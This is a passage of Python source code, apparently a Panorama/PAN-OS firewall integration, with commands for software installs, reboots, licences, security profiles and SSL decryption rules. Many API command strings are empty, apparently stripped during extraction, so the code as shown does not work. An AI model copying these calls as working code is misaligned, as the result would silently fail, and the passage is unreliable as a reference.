}\n        entry_context = {\"Panorama.Content.Install(val.JobID == obj.JobID)\": content_install_info}\n        human_readable = tableToMarkdown('Result:', content_install_info, ['JobID', 'Status'], removeNull=True)\n\n        return_results({\n            'Type': entryTypes['note'],\n            'ContentsFormat': formats['json'],\n            'Contents': result,\n            'ReadableContentsFormat': formats['markdown'],\n            'HumanReadable': human_readable,\n            'EntryContext': entry_context\n        })\n    else:\n        # no content install took place\n        return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_content_update_install_status(target: str, job_id: str):\n    params = {\n        'type': 'op',\n        'cmd': f'{job_id}',\n        'target': target,\n        'key': API_KEY\n    }\n    result = http_request(\n        URL,\n        'GET',\n        params=params\n    )\n\n    return result\n\n\ndef panorama_content_update_install_status_command(args: dict):\n    \"\"\"\n    Check jobID of content update install status\n    \"\"\"\n    target = str(args['target']) if 'target' in args else None\n    job_id = args['job_id']\n    result = panorama_content_update_install_status(target, job_id)\n\n    content_install_status = {\n        'JobID': result['response']['result']['job']['id']\n    }\n    if result['response']['result']['job']['status'] == 'FIN':\n        if result['response']['result']['job']['result'] == 'OK':\n            content_install_status['Status'] = 'Completed'\n        else:\n            # result['response']['job']['result'] == 'FAIL'\n            content_install_status['Status'] = 'Failed'\n            content_install_status['Details'] = result['response']['result']['job']\n\n    if result['response']['result']['job']['status'] == 'PEND':\n        content_install_status['Status'] = 'Pending'\n\n    entry_context = {\"Panorama.Content.Install(val.JobID == obj.JobID)\": content_install_status}\n    human_readable = tableToMarkdown('Content install status:', content_install_status,\n                                     ['JobID', 'Status', 'Details'], removeNull=True)\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['markdown'],\n        'HumanReadable': human_readable,\n        'EntryContext': entry_context\n    })\n\n\ndef 
panorama_check_latest_panos_software_command(target: Optional[str] = None):\n if DEVICE_GROUP:\n raise Exception('Checking latest PAN-OS version is only supported on Firewall (not Panorama).')\n params = {\n 'type': 'op',\n 'cmd': '',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return_results(result['response']['result'])\n\n\n@logger\ndef panorama_download_panos_version(target: str, target_version: str):\n params = {\n 'type': 'op',\n 'cmd': f'{target_version}'\n f'',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_download_panos_version_command(args: dict):\n \"\"\"\n Check jobID of pan-os version download\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Downloading PAN-OS version is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n target_version = str(args['target_version'])\n result = panorama_download_panos_version(target, target_version)\n\n if 'result' in result['response']:\n # download has been given a jobid\n panos_version_download = {\n 'JobID': result['response']['result']['job']\n }\n entry_context = {\"Panorama.PANOS.Download(val.JobID == obj.JobID)\": panos_version_download}\n human_readable = tableToMarkdown('Result:', panos_version_download, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no panos download took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_download_panos_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_download_panos_status_command(args: dict):\n \"\"\"\n Check jobID of panos download status\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('PAN-OS version download status is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n job_id = args.get('job_id')\n result = panorama_download_panos_status(target, job_id)\n panos_download_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n panos_download_status['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n panos_download_status['Status'] = 'Failed'\n panos_download_status['Details'] = result['response']['result']['job']\n\n if result['response']['result']['job']['status'] == 'PEND':\n panos_download_status['Status'] = 'Pending'\n\n human_readable = tableToMarkdown('PAN-OS download status:', panos_download_status,\n ['JobID', 'Status', 'Details'], removeNull=True)\n entry_context = {\"Panorama.PANOS.Download(val.JobID == obj.JobID)\": panos_download_status}\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\n@logger\ndef panorama_install_panos_version(target: str, target_version: str):\n params = {\n 'type': 'op',\n 'cmd': f'{target_version}'\n '',\n 'target': target,\n 'key': 
API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_install_panos_version_command(args: dict):\n \"\"\"\n Check jobID of panos install\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('PAN-OS installation is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n target_version = str(args['target_version'])\n result = panorama_install_panos_version(target, target_version)\n\n if 'result' in result['response']:\n # panos install has been given a jobid\n panos_install = {\n 'JobID': result['response']['result']['job']\n }\n entry_context = {\"Panorama.PANOS.Install(val.JobID == obj.JobID)\": panos_install}\n human_readable = tableToMarkdown('PAN-OS Installation:', panos_install, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no panos install took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_install_panos_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_install_panos_status_command(args: dict):\n \"\"\"\n Check jobID of panos install status\n \"\"\"\n target = str(args['target']) if 'target' in args else None\n job_id = args['job_id']\n result = panorama_install_panos_status(target, job_id)\n\n panos_install_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n panos_install_status['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n panos_install_status['Status'] = 'Failed'\n panos_install_status['Details'] = result['response']['result']['job']\n\n if result['response']['result']['job']['status'] == 'PEND':\n panos_install_status['Status'] = 'Pending'\n\n entry_context = {\"Panorama.PANOS.Install(val.JobID == obj.JobID)\": panos_install_status}\n human_readable = tableToMarkdown('PAN-OS installation status:', panos_install_status,\n ['JobID', 'Status', 'Details'], removeNull=True)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\ndef panorama_device_reboot_command(target: Optional[str] = None):\n if DEVICE_GROUP:\n raise Exception('Device reboot is only supported on Firewall (not Panorama).')\n params = {\n 'type': 'op',\n 'cmd': '',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return_results(result['response']['result'])\n\n\n@logger\ndef panorama_show_location_ip(ip_address: str):\n params = {\n 'type': 'op',\n 'cmd': f'{ip_address}',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_show_location_ip_command(ip_address: str):\n \"\"\"\n Check location of a specified ip address\n \"\"\"\n result = panorama_show_location_ip(ip_address)\n\n if 'response' not in result or '@status' not in result['response'] or result['response']['@status'] != 'success':\n raise Exception(f'Failed to 
successfully show the location of the specified ip: {ip_address}.')\n\n if 'response' in result and 'result' in result['response'] and 'entry' in result['response']['result']:\n entry = result['response']['result']['entry']\n show_location_output = {\n \"ip_address\": entry.get('ip'),\n \"country_name\": entry.get('country'),\n \"country_code\": entry.get('@cc'),\n \"status\": 'Found'\n }\n else:\n show_location_output = {\n \"ip_address\": ip_address,\n \"status\": 'NotFound'\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown(f'IP {ip_address} location:', show_location_output,\n ['ip_address', 'country_name', 'country_code', 'result'], removeNull=True),\n 'EntryContext': {\"Panorama.Location.IP(val.ip_address == obj.ip_address)\": show_location_output}\n })\n\n\n@logger\ndef panorama_get_license() -> Dict:\n params = {\n 'type': 'op',\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef panorama_get_license_command():\n \"\"\"\n Get information about PAN-OS available licenses and their statuses.\n \"\"\"\n available_licences = []\n result = panorama_get_license()\n if 'response' not in result or '@status' not in result['response'] or result['response']['@status'] != 'success':\n demisto.debug(str(result))\n raise Exception('Failed to get the information about PAN-OS available licenses and their statuses.')\n\n entry = result.get('response', {}).get('result', {}).get('licenses', {}).get('entry', [])\n for item in entry:\n available_licences.append({\n 'Authcode': item.get('authcode'),\n 'Base-license-name': item.get('base-license-name'),\n 'Description': item.get('description'),\n 'Expired': item.get('expired'),\n 'Feature': item.get('feature'),\n 'Expires': item.get('expires'),\n 'Issued': item.get('issued'),\n 'Serial': item.get('serial')\n })\n\n headers = ['Authcode', 'Base-license-name', 'Description', 'Feature', 'Serial', 'Expired', 'Expires', 'Issued']\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('PAN-OS Available Licenses', available_licences, headers, removeNull=True),\n 'EntryContext': {\"Panorama.License(val.Feature == obj.Feature)\": available_licences}\n })\n\n\ndef prettify_data_filtering_rule(rule: Dict) -> Dict:\n \"\"\"\n Prettify the data filtering rule to be compatible to our standard.\n Args:\n rule: The profile rule to prettify\n\n Returns: rule dictionary compatible to our standards.\n\n \"\"\"\n pretty_rule = {\n 'Name': rule.get('@name')\n }\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'file-type' in rule and 'member' in rule['file-type']:\n pretty_rule['File-type'] = rule['file-type']['member']\n if 'direction' in rule:\n pretty_rule['Direction'] = rule['direction']\n if 'alert-threshold' in rule:\n pretty_rule['Alert-threshold'] = rule['alert-threshold']\n if 'block-threshold' in rule:\n pretty_rule['Block-threshold'] = rule['block-threshold']\n if 'data-object' in rule:\n pretty_rule['Data-object'] = rule['data-object']\n if 'log-severity' in rule:\n pretty_rule['Log-severity'] = rule['log-severity']\n if 'description' in rule:\n pretty_rule['Description'] = rule['description']\n\n return pretty_rule\n\n\ndef 
prettify_data_filtering_rules(rules: Dict) -> List:\n \"\"\"\n\n Args:\n rules: All the rules to prettify\n\n Returns: A list of all the rules compatible with our standards.\n\n \"\"\"\n if not isinstance(rules, list):\n return [prettify_data_filtering_rule(rules)]\n return [prettify_data_filtering_rule(rule) for rule in rules]\n\n\n@logger\ndef get_security_profile(xpath: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_security_profiles_command(security_profile: str = None):\n \"\"\"\n Get information about profiles.\n \"\"\"\n if security_profile:\n xpath = f'{XPATH_RULEBASE}profiles/{security_profile}'\n else:\n xpath = f'{XPATH_RULEBASE}profiles'\n\n result = get_security_profile(xpath)\n if security_profile:\n security_profiles = result.get('response', {}).get('result', {})\n else:\n security_profiles = result.get('response', {}).get('result', {}).get('profiles', {})\n\n if '@dirtyId' in security_profiles:\n demisto.debug(f'Found uncommitted item:\\n{security_profiles}')\n raise Exception('Please commit the instance prior to getting the security profiles.')\n\n human_readable = ''\n context = {}\n if 'spyware' in security_profiles and security_profiles['spyware'] is not None:\n spyware_content = []\n profiles = security_profiles.get('spyware', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n spyware_rules = prettify_profiles_rules(rules)\n spyware_content.append({\n 'Name': profile['@name'],\n 'Rules': spyware_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n spyware_rules = prettify_profiles_rules(rules)\n spyware_content = [{\n 'Name': profiles['@name'],\n 'Rules': spyware_rules\n }]\n\n human_readable = tableToMarkdown('Anti Spyware Profiles', spyware_content)\n context.update({\"Panorama.Spyware(val.Name == obj.Name)\": spyware_content})\n\n if 'virus' in security_profiles and security_profiles['virus'] is not None:\n virus_content = []\n profiles = security_profiles.get('virus', {}).get('entry', [])\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('decoder', {}).get('entry', [])\n antivirus_rules = prettify_profiles_rules(rules)\n virus_content.append({\n 'Name': profile['@name'],\n 'Decoder': antivirus_rules\n })\n else:\n rules = profiles.get('decoder', {}).get('entry', [])\n antivirus_rules = prettify_profiles_rules(rules)\n virus_content = [{\n 'Name': profiles['@name'],\n 'Rules': antivirus_rules\n }]\n\n human_readable += tableToMarkdown('Antivirus Profiles', virus_content, headers=['Name', 'Decoder', 'Rules'],\n removeNull=True)\n context.update({\"Panorama.Antivirus(val.Name == obj.Name)\": virus_content})\n\n if 'file-blocking' in security_profiles and security_profiles['file-blocking'] is not None:\n file_blocking_content = []\n profiles = security_profiles.get('file-blocking', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n file_blocking_rules = prettify_profiles_rules(rules)\n file_blocking_content.append({\n 'Name': profile['@name'],\n 'Rules': file_blocking_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n file_blocking_rules = prettify_profiles_rules(rules)\n file_blocking_content = [{\n 'Name': profiles['@name'],\n 'Rules': file_blocking_rules\n }]\n\n human_readable += 
tableToMarkdown('File Blocking Profiles', file_blocking_content)\n context.update({\"Panorama.FileBlocking(val.Name == obj.Name)\": file_blocking_content})\n\n if 'vulnerability' in security_profiles and security_profiles['vulnerability'] is not None:\n vulnerability_content = []\n profiles = security_profiles.get('vulnerability', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n vulnerability_rules = prettify_profiles_rules(rules)\n vulnerability_content.append({\n 'Name': profile['@name'],\n 'Rules': vulnerability_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n vulnerability_rules = prettify_profiles_rules(rules)\n vulnerability_content = [{\n 'Name': profiles['@name'],\n 'Rules': vulnerability_rules\n }]\n\n human_readable += tableToMarkdown('Vulnerability Protection Profiles', vulnerability_content)\n context.update({\"Panorama.Vulnerability(val.Name == obj.Name)\": vulnerability_content})\n\n if 'data-filtering' in security_profiles and security_profiles['data-filtering'] is not None:\n data_filtering_content = []\n profiles = security_profiles.get('data-filtering', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n data_filtering_rules = prettify_data_filtering_rules(rules)\n data_filtering_content.append({\n 'Name': profile['@name'],\n 'Rules': data_filtering_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n data_filtering_rules = prettify_data_filtering_rules(rules)\n data_filtering_content = [{\n 'Name': profiles['@name'],\n 'Rules': data_filtering_rules\n }]\n\n human_readable += tableToMarkdown('Data Filtering Profiles', data_filtering_content)\n context.update({\"Panorama.DataFiltering(val.Name == obj.Name)\": data_filtering_content})\n\n if 'url-filtering' in security_profiles and security_profiles['url-filtering'] is not None:\n url_filtering_content = []\n profiles = security_profiles.get('url-filtering', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n url_filtering_rules = prettify_get_url_filter(profile)\n url_filtering_content.append({\n 'Name': profile['@name'],\n 'Rules': url_filtering_rules\n })\n else:\n url_filtering_rules = prettify_get_url_filter(profiles)\n url_filtering_content = [{\n 'Name': profiles['@name'],\n 'Rules': url_filtering_rules\n }]\n\n human_readable += tableToMarkdown('URL Filtering Profiles', url_filtering_content)\n context.update({'Panorama.URLFilter(val.Name == obj.Name)': url_filtering_content})\n\n if 'wildfire-analysis' in security_profiles and security_profiles['wildfire-analysis'] is not None:\n wildfire_analysis_content = []\n profiles = security_profiles.get('wildfire-analysis', {}).get('entry', [])\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n wildfire_rules = prettify_wildfire_rules(rules)\n wildfire_analysis_content.append({\n 'Name': profile['@name'],\n 'Rules': wildfire_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n wildfire_rules = prettify_wildfire_rules(rules)\n wildfire_analysis_content = [{\n 'Name': profiles['@name'],\n 'Rules': wildfire_rules\n }]\n\n human_readable += tableToMarkdown('WildFire Profiles', wildfire_analysis_content)\n context.update({\"Panorama.WildFire(val.Name == obj.Name)\": wildfire_analysis_content})\n\n return_results({\n 'Type': entryTypes['note'],\n 
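# --- Editor's aside (illustrative sketch, not part of the integration) ------
# The near-identical branches of get_security_profiles_command differ only in
# section key, rules container and prettifier, so they could be driven by one
# table (url-filtering, which uses prettify_get_url_filter on the whole
# profile, would stay separate). Note the original emits 'Decoder' for a list
# of antivirus profiles but 'Rules' for a single one; this sketch normalises
# on 'Rules'. Names below are defined in this file:
_PROFILE_SECTIONS = [
    # (section key, rules container key, prettifier)
    ('spyware', 'rules', prettify_profiles_rules),
    ('virus', 'decoder', prettify_profiles_rules),
    ('file-blocking', 'rules', prettify_profiles_rules),
    ('vulnerability', 'rules', prettify_profiles_rules),
    ('data-filtering', 'rules', prettify_data_filtering_rules),
    ('wildfire-analysis', 'rules', prettify_wildfire_rules),
]

def _prettify_section(profiles, rules_key, prettifier):
    # PAN-OS collapses a single entry to a bare dict, hence the normalisation.
    profiles = profiles if isinstance(profiles, list) else [profiles]
    return [{'Name': p['@name'],
             'Rules': prettifier(p.get(rules_key, {}).get('entry', []))}
            for p in profiles]
# ---------------------------------------------------------------------------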
'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': context\n })\n\n\n@logger\ndef apply_security_profile(xpath: str, profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY,\n 'element': f'{profile_name}'\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef apply_security_profile_command(profile_name: str, profile_type: str, rule_name: str, pre_post: str = None):\n if DEVICE_GROUP: # Panorama instance\n if not pre_post:\n raise Exception('Please provide the pre_post argument when applying profiles to rules in '\n 'Panorama instance.')\n xpath = f\"{XPATH_RULEBASE}{pre_post}/security/rules/entry[@name='{rule_name}']/profile-setting/\" \\\n f\"profiles/{profile_type}\"\n\n else: # firewall instance\n xpath = f\"{XPATH_RULEBASE}rulebase/security/rules/entry[@name='{rule_name}']/profile-setting/\" \\\n f\"profiles/{profile_type}\"\n\n apply_security_profile(xpath, profile_name)\n return_results(f'The profile {profile_name} has been applied to the rule {rule_name}')\n\n\n@logger\ndef get_ssl_decryption_rules(xpath: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_ssl_decryption_rules_command(pre_post: str):\n content = []\n if DEVICE_GROUP:\n if not pre_post:\n raise Exception('Please provide the pre_post argument when getting rules in Panorama instance.')\n else:\n xpath = XPATH_RULEBASE + pre_post + '/decryption/rules'\n else:\n xpath = XPATH_RULEBASE\n result = get_ssl_decryption_rules(xpath)\n ssl_decryption_rules = result.get('response', {}).get('result', {}).get('rules', {}).get('entry')\n if '@dirtyId' in ssl_decryption_rules:\n demisto.debug(f'Found uncommitted item:\\n{ssl_decryption_rules}')\n raise Exception('Please commit the instance prior to getting the ssl decryption rules.')\n if isinstance(ssl_decryption_rules, list):\n for item in ssl_decryption_rules:\n content.append({\n 'Name': item.get('@name'),\n 'UUID': item.get('@uuid'),\n 'Target': item.get('target'),\n 'Category': item.get('category'),\n 'Service': item.get('service', {}).get('member'),\n 'Type': item.get('type'),\n 'From': item.get('from').get('member'),\n 'To': item.get('to').get('member'),\n 'Source': item.get('source').get('member'),\n 'Destination': item.get('destination', {}).get('member'),\n 'Source-user': item.get('source-user', {}).get('member'),\n 'Action': item.get('action'),\n 'Description': item.get('description')\n })\n else:\n content = [{\n 'Name': ssl_decryption_rules.get('@name'),\n 'UUID': ssl_decryption_rules.get('@uuid'),\n 'Target': ssl_decryption_rules.get('target'),\n 'Category': ssl_decryption_rules.get('category'),\n 'Service': ssl_decryption_rules.get('service', {}).get('member'),\n 'Type': ssl_decryption_rules.get('type'),\n 'From': ssl_decryption_rules.get('from').get('member'),\n 'To': ssl_decryption_rules.get('to').get('member'),\n 'Source': ssl_decryption_rules.get('source').get('member'),\n 'Destination': ssl_decryption_rules.get('destination', {}).get('member'),\n 'Source-user': ssl_decryption_rules.get('source-user', {}).get('member'),\n 'Action': ssl_decryption_rules.get('action'),\n 'Description': ssl_decryption_rules.get('description')\n }]\n\n headers = ['Name', 'UUID', 'Description', 'Target', 'Service', 'Category', 'Type', 'From', 'To', 'Source',\n 
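# --- Editor's note ----------------------------------------------------------
# apply_security_profile above posts 'element': f'{profile_name}', the
# extraction-stripped remnant of a member element; the config API normally
# expects (reconstruction, not confirmed by the source):
#
#     'element': f'<member>{profile_name}</member>'
#
# Separately, get_ssl_decryption_rules_command reads item.get('from').get('member')
# (and 'to'/'source') without a dict default, unlike its other lookups; a
# missing key there raises AttributeError, so .get('from', {}) would be safer.
# ---------------------------------------------------------------------------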
'Destination', 'Action', 'Source-user']\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('SSL Decryption Rules', content, headers, removeNull=True),\n 'EntryContext': {\"Panorama.SSLRule(val.UUID == obj.UUID)\": content}\n })\n\n\ndef prettify_profile_rule(rule: Dict) -> Dict:\n \"\"\"\n Args:\n rule: The rule dictionary.\n\n Returns: Dictionary of the rule compatible with our standards.\n\n \"\"\"\n pretty_rule = {\n 'Name': rule['@name'],\n 'Action': rule['action']\n }\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'file-type' in rule and 'member' in rule['file-type']:\n pretty_rule['File-type'] = rule['file-type']['member']\n if 'wildfire-action' in rule:\n pretty_rule['WildFire-action'] = rule['wildfire-action']\n if 'category' in rule and 'member' in rule['category']:\n pretty_rule['Category'] = rule['category']['member']\n elif 'category' in rule:\n pretty_rule['Category'] = rule['category']\n if 'severity' in rule and 'member' in rule['severity']:\n pretty_rule['Severity'] = rule['severity']['member']\n if 'threat-name' in rule and 'member' in rule['threat-name']:\n pretty_rule['Threat-name'] = rule['threat-name']['member']\n elif 'threat-name' in rule:\n pretty_rule['Threat-name'] = rule['threat-name']\n if 'packet-capture' in rule:\n pretty_rule['Packet-capture'] = rule['packet-capture']\n if '@maxver' in rule:\n pretty_rule['Max_version'] = rule['@maxver']\n if 'sinkhole' in rule:\n pretty_rule['Sinkhole'] = {}\n if 'ipv4-address' in rule['sinkhole']:\n pretty_rule['Sinkhole']['IPV4'] = rule['sinkhole']['ipv4-address']\n if 'ipv6-address' in rule['sinkhole']:\n pretty_rule['Sinkhole']['IPV6'] = rule['sinkhole']['ipv6-address']\n if 'host' in rule:\n pretty_rule['Host'] = rule['host']\n if 'cve' in rule and 'member' in rule['cve']:\n pretty_rule['CVE'] = rule['cve']['member']\n if 'vendor-id' in rule and 'member' in rule['vendor-id']:\n pretty_rule['Vendor-id'] = rule['vendor-id']['member']\n if 'analysis' in rule:\n pretty_rule['Analysis'] = rule['analysis']\n return pretty_rule\n\n\ndef prettify_profiles_rules(rules: Dict) -> List:\n \"\"\"\n Args:\n rules: The rules to prettify.\n\n Returns: List with the rules that are compatible to our standard.\n\n \"\"\"\n if not isinstance(rules, list):\n return [prettify_profile_rule(rules)]\n pretty_rules_arr = []\n for rule in rules:\n pretty_rule = prettify_profile_rule(rule)\n pretty_rules_arr.append(pretty_rule)\n\n return pretty_rules_arr\n\n\n@logger\ndef get_anti_spyware_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/spyware',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_anti_spyware_best_practice_command():\n result = get_anti_spyware_best_practice()\n spyware_profile = result.get('response', {}).get('result', {}).get('spyware').get('entry', [])\n strict_profile = next(item for item in spyware_profile if item['@name'] == 'strict')\n\n botnet_domains = strict_profile.get('botnet-domains', {}).get('lists', {}).get('entry', [])\n pretty_botnet_domains = prettify_profiles_rules(botnet_domains)\n\n sinkhole = strict_profile.get('botnet-domains', {}).get('sinkhole', {})\n sinkhole_content = []\n if sinkhole:\n sinkhole_content = [\n {'ipv6-address': sinkhole['ipv6-address'], 
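# --- Editor's aside (illustrative, not part of the integration) -------------
# PAN-OS XML-to-dict conversion collapses single-entry lists into a bare
# dict, which is why every prettify_* helper starts with an isinstance check.
# A quick demonstration with prettify_profiles_rules, defined above:
assert prettify_profiles_rules({'@name': 'r1', 'action': 'alert'}) == [
    {'Name': 'r1', 'Action': 'alert'}
]
# Note that the sinkhole handling here indexes sinkhole['ipv4-address'] and
# sinkhole['ipv6-address'] directly; .get(...) would be safer if either key
# can be absent.
# ---------------------------------------------------------------------------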
'ipv4-address': sinkhole['ipv4-address']}\n ]\n\n botnet_output = pretty_botnet_domains + sinkhole_content\n\n human_readable = tableToMarkdown('Anti Spyware Botnet-Domains Best Practice', botnet_output,\n ['Name', 'Action', 'Packet-capture', 'ipv4-address', 'ipv6-address'],\n removeNull=True)\n\n rules = strict_profile.get('rules', {}).get('entry')\n profile_rules = prettify_profiles_rules(rules)\n human_readable += tableToMarkdown('Anti Spyware Best Practice Rules', profile_rules,\n ['Name', 'Severity', 'Action', 'Category', 'Threat-name'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.Spyware.Rule(val.Name == obj.Name)': profile_rules,\n 'Panorama.Spyware.BotentDomain(val.Name == obj.Name)': pretty_botnet_domains,\n 'Panorama.Spyware.BotentDomain.Sinkhole(val.ipv4-address == obj.ipv4-address)': sinkhole_content\n }\n })\n\n\n@logger\ndef get_file_blocking_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/file-blocking',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_file_blocking_best_practice_command():\n results = get_file_blocking_best_practice()\n file_blocking_profile = results.get('response', {}).get('result', {}).get('file-blocking', {}).get('entry', [])\n\n strict_profile = next(item for item in file_blocking_profile if item['@name'] == 'strict file blocking')\n file_blocking_rules = strict_profile.get('rules', {}).get('entry', [])\n\n rules = prettify_profiles_rules(file_blocking_rules)\n human_readable = tableToMarkdown('File Blocking Profile Best Practice', rules,\n ['Name', 'Action', 'File-type', 'Application'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.FileBlocking.Rule(val.Name == obj.Name)': rules,\n }\n })\n\n\n@logger\ndef get_antivirus_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/virus',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_antivirus_best_practice_command():\n results = get_antivirus_best_practice()\n antivirus_profile = results.get('response', {}).get('result', {}).get('virus', {})\n strict_profile = antivirus_profile.get('entry', {})\n antivirus_rules = strict_profile.get('decoder', {}).get('entry', [])\n\n rules = prettify_profiles_rules(antivirus_rules)\n human_readable = tableToMarkdown('Antivirus Best Practice Profile', rules, ['Name', 'Action', 'WildFire-action'],\n removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.Antivirus.Decoder(val.Name == obj.Name)': rules,\n }\n })\n\n\n@logger\ndef get_vulnerability_protection_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/vulnerability',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef 
